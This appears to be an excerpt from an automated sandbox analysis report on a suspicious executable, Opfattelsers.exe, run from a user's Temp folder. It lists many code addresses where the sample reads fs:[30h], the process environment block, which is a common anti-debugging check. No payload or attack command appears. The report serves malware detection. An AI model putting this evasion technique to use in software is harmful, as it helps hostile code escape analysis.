Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FC4F mov eax, dword ptr fs:[00000030h]	6_2_1F85FC4F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79DCA0 mov eax, dword ptr fs:[00000030h]	6_2_1F79DCA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CFCA0 mov ecx, dword ptr fs:[00000030h]	6_2_1F7CFCA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CFCA0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CFCA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CFCA0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CFCA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CFCA0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CFCA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CFCA0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CFCA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DBCA0 mov eax, dword ptr fs:[00000030h]	6_2_1F7DBCA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DBCA0 mov eax, dword ptr fs:[00000030h]	6_2_1F7DBCA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DBCA0 mov ecx, dword ptr fs:[00000030h]	6_2_1F7DBCA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DBCA0 mov eax, dword ptr fs:[00000030h]	6_2_1F7DBCA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A3C84 mov eax, dword ptr fs:[00000030h]	6_2_1F7A3C84
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A3C84 mov eax, dword ptr fs:[00000030h]	6_2_1F7A3C84
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A3C84 mov eax, dword ptr fs:[00000030h]	6_2_1F7A3C84
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A3C84 mov eax, dword ptr fs:[00000030h]	6_2_1F7A3C84
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F873B80 mov eax, dword ptr fs:[00000030h]	6_2_1F873B80
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F873B80 mov eax, dword ptr fs:[00000030h]	6_2_1F873B80
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F873B80 mov eax, dword ptr fs:[00000030h]	6_2_1F873B80
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F869B8B mov eax, dword ptr fs:[00000030h]	6_2_1F869B8B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F869B8B mov eax, dword ptr fs:[00000030h]	6_2_1F869B8B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FB97 mov eax, dword ptr fs:[00000030h]	6_2_1F85FB97
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79FB4C mov edi, dword ptr fs:[00000030h]	6_2_1F79FB4C
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D9B28 mov eax, dword ptr fs:[00000030h]	6_2_1F7D9B28
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D9B28 mov eax, dword ptr fs:[00000030h]	6_2_1F7D9B28
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82FBDC mov eax, dword ptr fs:[00000030h]	6_2_1F82FBDC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82FBDC mov eax, dword ptr fs:[00000030h]	6_2_1F82FBDC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82FBDC mov eax, dword ptr fs:[00000030h]	6_2_1F82FBDC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FBF3 mov eax, dword ptr fs:[00000030h]	6_2_1F85FBF3
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A1B04 mov eax, dword ptr fs:[00000030h]	6_2_1F7A1B04
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A1B04 mov eax, dword ptr fs:[00000030h]	6_2_1F7A1B04
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FB0C mov eax, dword ptr fs:[00000030h]	6_2_1F85FB0C
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E1BEF mov eax, dword ptr fs:[00000030h]	6_2_1F7E1BEF
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7E1BEF mov eax, dword ptr fs:[00000030h]	6_2_1F7E1BEF
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F873B10 mov eax, dword ptr fs:[00000030h]	6_2_1F873B10
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3BD6 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3BD6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3BD6 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3BD6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3BD6 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3BD6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3BD6 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3BD6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B3BD6 mov eax, dword ptr fs:[00000030h]	6_2_1F7B3BD6
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F797BCD mov eax, dword ptr fs:[00000030h]	6_2_1F797BCD
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F797BCD mov ecx, dword ptr fs:[00000030h]	6_2_1F797BCD
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A9BC4 mov eax, dword ptr fs:[00000030h]	6_2_1F7A9BC4
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F835B50 mov eax, dword ptr fs:[00000030h]	6_2_1F835B50
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F835B50 mov eax, dword ptr fs:[00000030h]	6_2_1F835B50
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CDBA0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CDBA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CDBA0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CDBA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CDBA0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CDBA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CDBA0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CDBA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CDBA0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CDBA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CDBA0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CDBA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D9B9F mov eax, dword ptr fs:[00000030h]	6_2_1F7D9B9F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D9B9F mov eax, dword ptr fs:[00000030h]	6_2_1F7D9B9F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D9B9F mov eax, dword ptr fs:[00000030h]	6_2_1F7D9B9F
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F843B60 mov eax, dword ptr fs:[00000030h]	6_2_1F843B60
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F843B60 mov eax, dword ptr fs:[00000030h]	6_2_1F843B60
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F843B60 mov eax, dword ptr fs:[00000030h]	6_2_1F843B60
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F843B60 mov eax, dword ptr fs:[00000030h]	6_2_1F843B60
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F843B60 mov eax, dword ptr fs:[00000030h]	6_2_1F843B60
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FA87 mov eax, dword ptr fs:[00000030h]	6_2_1F85FA87
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F851AA3 mov eax, dword ptr fs:[00000030h]	6_2_1F851AA3
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F851AA3 mov eax, dword ptr fs:[00000030h]	6_2_1F851AA3
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F851AA3 mov eax, dword ptr fs:[00000030h]	6_2_1F851AA3
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84DAAC mov ecx, dword ptr fs:[00000030h]	6_2_1F84DAAC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84DAAC mov ecx, dword ptr fs:[00000030h]	6_2_1F84DAAC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84DAAC mov eax, dword ptr fs:[00000030h]	6_2_1F84DAAC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F799A40 mov ecx, dword ptr fs:[00000030h]	6_2_1F799A40
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F821ACB mov eax, dword ptr fs:[00000030h]	6_2_1F821ACB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F821ACB mov ecx, dword ptr fs:[00000030h]	6_2_1F821ACB
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7ABA30 mov eax, dword ptr fs:[00000030h]	6_2_1F7ABA30
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7ABA30 mov ecx, dword ptr fs:[00000030h]	6_2_1F7ABA30
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7ABA30 mov eax, dword ptr fs:[00000030h]	6_2_1F7ABA30
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7ABA30 mov eax, dword ptr fs:[00000030h]	6_2_1F7ABA30
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7ABA30 mov eax, dword ptr fs:[00000030h]	6_2_1F7ABA30
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7ABA30 mov eax, dword ptr fs:[00000030h]	6_2_1F7ABA30
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F835AD0 mov eax, dword ptr fs:[00000030h]	6_2_1F835AD0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CDA20 mov eax, dword ptr fs:[00000030h]	6_2_1F7CDA20
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CDA20 mov eax, dword ptr fs:[00000030h]	6_2_1F7CDA20
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7C9A18 mov ecx, dword ptr fs:[00000030h]	6_2_1F7C9A18
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79BA10 mov eax, dword ptr fs:[00000030h]	6_2_1F79BA10
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D5A01 mov eax, dword ptr fs:[00000030h]	6_2_1F7D5A01
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D5A01 mov ecx, dword ptr fs:[00000030h]	6_2_1F7D5A01
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D5A01 mov eax, dword ptr fs:[00000030h]	6_2_1F7D5A01
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D5A01 mov eax, dword ptr fs:[00000030h]	6_2_1F7D5A01
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85FA02 mov eax, dword ptr fs:[00000030h]	6_2_1F85FA02
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84BA0B mov eax, dword ptr fs:[00000030h]	6_2_1F84BA0B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84BA0B mov eax, dword ptr fs:[00000030h]	6_2_1F84BA0B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84BA0B mov eax, dword ptr fs:[00000030h]	6_2_1F84BA0B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84BA0B mov eax, dword ptr fs:[00000030h]	6_2_1F84BA0B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F847A11 mov edi, dword ptr fs:[00000030h]	6_2_1F847A11
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79BAE0 mov eax, dword ptr fs:[00000030h]	6_2_1F79BAE0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F81DA1D mov eax, dword ptr fs:[00000030h]	6_2_1F81DA1D
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CBADA mov eax, dword ptr fs:[00000030h]	6_2_1F7CBADA
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CDAAE mov eax, dword ptr fs:[00000030h]	6_2_1F7CDAAE
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7ABAA0 mov eax, dword ptr fs:[00000030h]	6_2_1F7ABAA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7ABAA0 mov eax, dword ptr fs:[00000030h]	6_2_1F7ABAA0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79FAA4 mov ecx, dword ptr fs:[00000030h]	6_2_1F79FAA4
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F797A80 mov eax, dword ptr fs:[00000030h]	6_2_1F797A80
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F797A80 mov eax, dword ptr fs:[00000030h]	6_2_1F797A80
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F797A80 mov eax, dword ptr fs:[00000030h]	6_2_1F797A80
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F833A78 mov eax, dword ptr fs:[00000030h]	6_2_1F833A78
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F833A78 mov eax, dword ptr fs:[00000030h]	6_2_1F833A78
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F833A78 mov eax, dword ptr fs:[00000030h]	6_2_1F833A78
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F833A78 mov eax, dword ptr fs:[00000030h]	6_2_1F833A78
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F833A78 mov eax, dword ptr fs:[00000030h]	6_2_1F833A78
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F833A78 mov eax, dword ptr fs:[00000030h]	6_2_1F833A78
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F829983 mov eax, dword ptr fs:[00000030h]	6_2_1F829983
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CD978 mov eax, dword ptr fs:[00000030h]	6_2_1F7CD978
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85598D mov eax, dword ptr fs:[00000030h]	6_2_1F85598D
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85598D mov eax, dword ptr fs:[00000030h]	6_2_1F85598D
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85598D mov eax, dword ptr fs:[00000030h]	6_2_1F85598D
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DB970 mov eax, dword ptr fs:[00000030h]	6_2_1F7DB970
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DB970 mov eax, dword ptr fs:[00000030h]	6_2_1F7DB970
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7DB970 mov eax, dword ptr fs:[00000030h]	6_2_1F7DB970
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D196E mov eax, dword ptr fs:[00000030h]	6_2_1F7D196E
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D196E mov eax, dword ptr fs:[00000030h]	6_2_1F7D196E
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7C7962 mov eax, dword ptr fs:[00000030h]	6_2_1F7C7962
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F797967 mov eax, dword ptr fs:[00000030h]	6_2_1F797967
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]	6_2_1F84F99B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]	6_2_1F84F99B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]	6_2_1F84F99B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]	6_2_1F84F99B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]	6_2_1F84F99B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]	6_2_1F84F99B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84F99B mov ecx, dword ptr fs:[00000030h]	6_2_1F84F99B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84F99B mov ecx, dword ptr fs:[00000030h]	6_2_1F84F99B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]	6_2_1F84F99B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]	6_2_1F84F99B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]	6_2_1F84F99B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]	6_2_1F84F99B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F84F99B mov eax, dword ptr fs:[00000030h]	6_2_1F84F99B
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7AF950 mov eax, dword ptr fs:[00000030h]	6_2_1F7AF950
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7AF950 mov eax, dword ptr fs:[00000030h]	6_2_1F7AF950
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B9950 mov eax, dword ptr fs:[00000030h]	6_2_1F7B9950
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7B9950 mov eax, dword ptr fs:[00000030h]	6_2_1F7B9950
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8779BC mov eax, dword ptr fs:[00000030h]	6_2_1F8779BC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8779BC mov ecx, dword ptr fs:[00000030h]	6_2_1F8779BC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8779BC mov eax, dword ptr fs:[00000030h]	6_2_1F8779BC
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F87B9DF mov eax, dword ptr fs:[00000030h]	6_2_1F87B9DF
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F87B9DF mov eax, dword ptr fs:[00000030h]	6_2_1F87B9DF
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CB919 mov eax, dword ptr fs:[00000030h]	6_2_1F7CB919
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]	6_2_1F79F910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]	6_2_1F79F910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]	6_2_1F79F910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]	6_2_1F79F910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]	6_2_1F79F910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]	6_2_1F79F910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]	6_2_1F79F910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]	6_2_1F79F910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]	6_2_1F79F910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]	6_2_1F79F910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]	6_2_1F79F910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85B9EE mov eax, dword ptr fs:[00000030h]	6_2_1F85B9EE
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85B9EE mov ecx, dword ptr fs:[00000030h]	6_2_1F85B9EE
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85B9EE mov eax, dword ptr fs:[00000030h]	6_2_1F85B9EE
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8219EE mov eax, dword ptr fs:[00000030h]	6_2_1F8219EE
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8219EE mov eax, dword ptr fs:[00000030h]	6_2_1F8219EE
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F8219EE mov eax, dword ptr fs:[00000030h]	6_2_1F8219EE
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F845910 mov eax, dword ptr fs:[00000030h]	6_2_1F845910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F845910 mov eax, dword ptr fs:[00000030h]	6_2_1F845910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F845910 mov eax, dword ptr fs:[00000030h]	6_2_1F845910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F845910 mov eax, dword ptr fs:[00000030h]	6_2_1F845910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F845910 mov eax, dword ptr fs:[00000030h]	6_2_1F845910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F845910 mov eax, dword ptr fs:[00000030h]	6_2_1F845910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F845910 mov eax, dword ptr fs:[00000030h]	6_2_1F845910
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CD9D0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CD9D0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CD9D0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CD9D0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CD9D0 mov esi, dword ptr fs:[00000030h]	6_2_1F7CD9D0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CD9D0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CD9D0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CD9D0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CD9D0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CD9D0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CD9D0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CD9D0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CD9D0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7CD9D0 mov eax, dword ptr fs:[00000030h]	6_2_1F7CD9D0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F855930 mov eax, dword ptr fs:[00000030h]	6_2_1F855930
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F855930 mov ecx, dword ptr fs:[00000030h]	6_2_1F855930
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A59C0 mov eax, dword ptr fs:[00000030h]	6_2_1F7A59C0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A59C0 mov eax, dword ptr fs:[00000030h]	6_2_1F7A59C0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A59C0 mov eax, dword ptr fs:[00000030h]	6_2_1F7A59C0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A59C0 mov eax, dword ptr fs:[00000030h]	6_2_1F7A59C0
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7A99BE mov eax, dword ptr fs:[00000030h]	6_2_1F7A99BE
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F82B953 mov eax, dword ptr fs:[00000030h]	6_2_1F82B953
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F825960 mov eax, dword ptr fs:[00000030h]	6_2_1F825960
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79B991 mov eax, dword ptr fs:[00000030h]	6_2_1F79B991
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79B991 mov eax, dword ptr fs:[00000030h]	6_2_1F79B991
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F85F97D mov eax, dword ptr fs:[00000030h]	6_2_1F85F97D
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F79D878 mov eax, dword ptr fs:[00000030h]	6_2_1F79D878
Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe	Code function: 6_2_1F7D1876 mov eax, dword ptr fs:[00000030h]	6_2_1F7D1876
